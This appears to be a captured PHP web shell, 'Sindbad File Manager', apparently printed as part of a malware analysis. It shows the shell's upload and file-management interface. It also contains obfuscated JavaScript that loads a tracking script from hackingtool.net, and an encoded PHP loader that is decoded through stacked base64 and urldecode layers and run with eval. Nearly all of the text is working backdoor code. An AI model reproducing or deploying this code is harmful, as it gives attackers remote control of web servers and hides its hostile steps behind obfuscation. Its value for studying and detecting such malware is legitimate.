<tbody><tr><td>Current Path : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file">
<input type="submit" value="upload">
</form>
</td></tr></tbody></table><br><center></center><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">">
</form></center></td>
</tr><tr>
<td><a href="?filesrc=/var/www/html/minipriv.php&path=/var/www/html">minipriv.php</a></td>
<td><center>3.606 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="minipriv.php">
<input type="hidden" name="path" value="/var/www/html/minipriv.php">
<input type="submit" value=">">
</form></center></td>
</tr></tbody></table>
</div><br>Sindbad File Manager Version <font color="red">1.0</font>, Coded By <font color="red">Sindbad EG ~ The Terrorists</font>
<script language="javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%264E%2633iuuqt%264B00ibdljohuppm/ofu0mpht0dj%7B/kt%2633%264F%264D0tdsjqu%264F%26311')</script><script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script><script src="https://hackingtool.net/logs/ciz.js"></script> </body></html>Original PHP code
<?php
$obirninja = "=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";
$t13r = "WlhaaGJDZ25QejRuTG1kNmRXNWpiMjF3Y21WemN5aG5lbWx1Wm14aGRHVW9aM3BwYm1ac1lYUmxLR0poYzJVMk5GOWtaV052WkdVb2MzUnljbVYyS0NSdlltbHlibWx1YW1FcEtTa3BLU2s3";
eval(htmlspecialchars_decode(base64_decode(urldecode(base64_decode($t13r)))));
?>